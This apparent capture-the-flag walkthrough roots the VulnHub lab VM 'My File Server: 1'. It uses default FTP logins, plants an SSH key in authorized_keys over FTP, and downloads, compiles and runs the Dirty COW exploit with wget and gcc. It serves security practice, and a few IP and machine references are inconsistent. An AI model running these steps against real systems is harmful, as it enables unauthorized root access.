In this article, we will solve a Capture the Flag (CTF) challenge which was posted on VulnHub.

As you may know from previous articles, Vulnhub.com is a platform which provides users with vulnerable applications/machines to gain practical hands-on experience in the field of information security. You can check my previous articles for more CTF challenges. I have also provided a downloadable URL for this CTF; you can download the virtual machine (VM) and run it on VirtualBox.

The torrent downloadable URL is also available for this VM. It has been added in the reference section of this article.

There was no further clue or information provided by the author on VulnHub, but all of the CTFs have the common goal of gaining root privileges on the target machine. There are two prerequisites to attempt this challenge: having some knowledge of Linux commands and the ability to run some basic penetration testing tools.

For those who are not aware of the site, VulnHub is a well-known website for security researchers. It aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable VMs from this website and try to exploit them. I highly suggest attempting them, as it is a good way to sharpen your skills and also learn new techniques in a safe environment.

Please note: For all of these machines, I have used Oracle VirtualBox to run the downloaded VMs. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The steps

  1. Find the IP address of the victim machine with the netdiscover
  2. Scan open ports by using the nmap
  3. Enumerate FTP Service.
  4. Enumerate another FTP service running on a different port.
  5. Enumerate the web application with the dirb
  6. Enumerate SMB Service.
  7. Get user access on the victim machine.
  8. Exploit kernel and get root access.

The walkthrough

Step 1

After downloading the file server VM that will be our victim, we run it in VirtualBox. Now, the first step is to find out its IP address. On Kali — the attacker machine — I ran the . The netdiscover command output can be seen in the screenshot given below:

Command used: netdiscover

As we can see above, we found the victim machine’s IP address: 192.168.1.21 (the attacker IP address is 192.168.1.14).

Please note: The victim and attacker machine IP addresses may be different, as per your network configuration.

Step 2

The next step is to find the open ports and services available on the victim. I conducted an nmap full-port scan for this purpose. The nmap results can be seen in the screenshot given below:

Command used: nmap -p- 192.168.1.21 -sV

As we can see above, there are a lot of open ports and services available on the target machine. In the command above, I used the -sV switch for enumerating the version information of the identified services. This will help us identify vulnerable services to exploit.

Step 3

Let’s start by exploring the open ports and services on the target machine. As the FTP port 21 was open, I decided to start there.

I tried to connect to the victim machine’s FTP service by guessing common credentials and one worked. It can be seen in the following screenshot:

Commands used:

  1. ftp 192.168.1.21
  2. ls

Credentials:

  1. Username: ftp
  2. Password: (none)

As we know that we now have the FTP access on the target machine, I run the ls command to see the list of files and directories available for default user.

From the results, I learn that there was one empty directory available on the target machine. I tried exploring the “pub” directory for further contents, but that was a dead end. After that, I checked the vsFTPd version for an exploit on Google but could not find a working exploit for remote code execution to get us any further.

Step 4

As we know from Step 2 above, there is one more FTP port available on the target machine. Let’s check the FTP service on port 2121. I started with enumerating the FTP login with some default credentials and one of them worked. The screenshot for this can be seen below:

Command Used: ftp 192.168.1.22 2121

Credentials:

  1. Username: anonymous
  2. Password: anonymous

As we can see above, we’ve got the anonymous user FTP access on port 2121 by using default credentials. This time it worked for me, as I was able to view the contents of files on the target machine. I used the ls command and was able to list the contents of the “log” directory from there.

In this directory, there were a lot of log files available. However, none of them seems to be working for our purpose.

Next, I tried to look for an available exploit for the FTP service running through this port. The FTP version which is running on this port was: ProFTPD 1.3.5 Server. I found some useful exploits on Google for this version of the FTP service. The screenshot can be seen below:

I tried to exploit the FTP server by using the exploit-db exploits, but none of them worked for the target machine. So, I decided to leave it and move on to the next open port.

Step 5

After exploring the FTP ports to get into the target machine, I shifted my attention to the HTTP port 80. I opened the target machine IP address into the browser and there was a simple webpage. This can be seen in the following screenshot:

As we can see above, there is not much to do on the webpage. I decided to enumerate all files on the target machine to find out more about the web application. I used the dirb utility for this purpose, which is a default tool in Kali Linux. The output of the dirb scan can be seen in the following screenshot:

Command used: dirb http://192.168.1.21

We could not find much information from the scan as there was only an “index” file available.

I decided to run a passive vulnerability scan on the web application as the last hope. For this purpose, I chose the nikto vulnerability scanner which is by default available on Kali Linux and is used for scanning the host for web-based files and vulnerabilities. The command used and the results of the scan can be seen below:

Command used: nikto –host http://192.168.1.21

As we can see, there is an interesting text file available on the target machine. When I opened this file on the browser, there was a password mentioned. It can be seen in the following screenshot.

I found a password but did not know where to use it, as I do not have any usernames. Nor did I find anything while enumerating the FTP services. In order to utilize the password, we must know the username. There were a lot of other open ports yet to be explored that were identified during the port scanning, so I took a note of this information and moved on to the other ports.

Step 6

So far, we have explored the FTP ports and HTTP port, but there are still five open ports remaining to be checked. Next, I started with the SMB service which was running on the port 445 on the target machine.

I used the smbmap utility, which is available in Kali Linux by default. It is basically used to enumerate the SMB server. The output of the command can be seen in the following screenshot:

Command used: smbmap -H 192.168.1.21

As we can see in the highlighted section of the above screenshot, there was a username identified by the SMB service scan. Since we already know a password from the previous step, let’s try it with the SMB username.

SSH on port 22 was open on the target machine, so I tried to login to the target machine with the username and password through SSH:

Command used: ssh smbuser@192.168.1.21

As we can see, those credentials did not work for SSH. I tried the same username and password with the FTP service on port 21, and this time it worked as I was able to log into the target system through FTP. This can be seen in the following screenshot:

Command used: ftp 192.168.1.21

After logging into FTP, I used the pwd command to check the current directory. It showed that the current directory was “/home/smbuser”. In the next step, we will use this information for gaining user access on the target machine.

Step 7

In the previous step, we were able to log into the FTP service. Now I’ll create an SSH key pair on the attacker machine and transfer the keys to the victim’s authorized SSH key folder. After that, we can use the private key to log into the target system. I created the SSH keys on the target machine and the step-by-step commands used to achieve this can be seen in the below screenshot:

Command used: ssh-keygen

We used the ssh-keygen command to create the SSH authorization keypair on the attacker machine. A public key (“infosec.pub”) and private key (“infosec”) were generated.

Now, we will transfer these keys on the target machine. For that, first we connected through the FTP port using the “smbuser” credentials again. The process and commands used can be seen below.

Command used:

  1. mkdir .ssh
  2. cd .ssh
  3. put infosec.pub authorized_keys

After logging into FTP as “smbuser”, I created a hidden directory named “.ssh” in the smbuser’s home directory. After that, I transferred the public key (“infosec.pub”) to the victim machine using the put FTP command. The transfer was successful, so now let’s log into the target machine via SSH.

Command used: ssh -i infosec smbuser@192.168.1.21

As we can see above, we used the private key (“infosec”) created on the attacker machine to log into the SSH service on victim machine 192.168.1.21 as user “smbuser”.

Step 8

After logging into the victim, I used the uname -a command to check the kernel and OS versions. This can be seen below:

Command used: uname -a

As we can see above, by checking the victim’s operating system version, I discovered that it was running on an outdated kernel. As we know, outdated software often contains unpatched vulnerabilities, so I searched for an available exploit on Google. There were two exploits available:

I opened the very first URL, which was a special kind of privilege escalation exploit. The exploit details can be seen below.

After studying the exploit procedure, I went back to the victim machine and downloaded the exploit code there using the wget utility. This can be seen in the following screenshot:

Commands used:

  1. wget https://www.exploit-db.com/raw/40616
  2. mv 40616 cowroot.c
  3. gcc cowroot.c -o cowroot -pthread
  4. ls -l

Our exploit was successfully downloaded on the target machine. As per the procedure mentioned by the author of the exploit, we renamed the exploit “cowroot.c” using the mv command, then compiled the exploit code using gcc and saved the resulting executable program as “cowroot” in the same directory. This means that the exploit is ready to be executed on the target machine. So, let’s run it and see the results.

Commands used:

  1. ./cowroot
  2. id
  3. cat /root/proof.txt

As seen above, I used the ./cowroot command to execute the exploit on the target machine. When that was done, I verified the user privileges using the id command which confirmed that our exploit worked successfully as we had root access on the victim machine. The last step was to read the flag file found at “/root/proof.txt”.

This completes this CTF challenge. I hope you learned a lot from it!

 

Sources

  1. Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method), Exploit-DB
  2. My File Server: 1, VulnHub
  3. Download My File Server: 1, Google Drive
  4. Download My File Server: 1, VulnHub (torrent)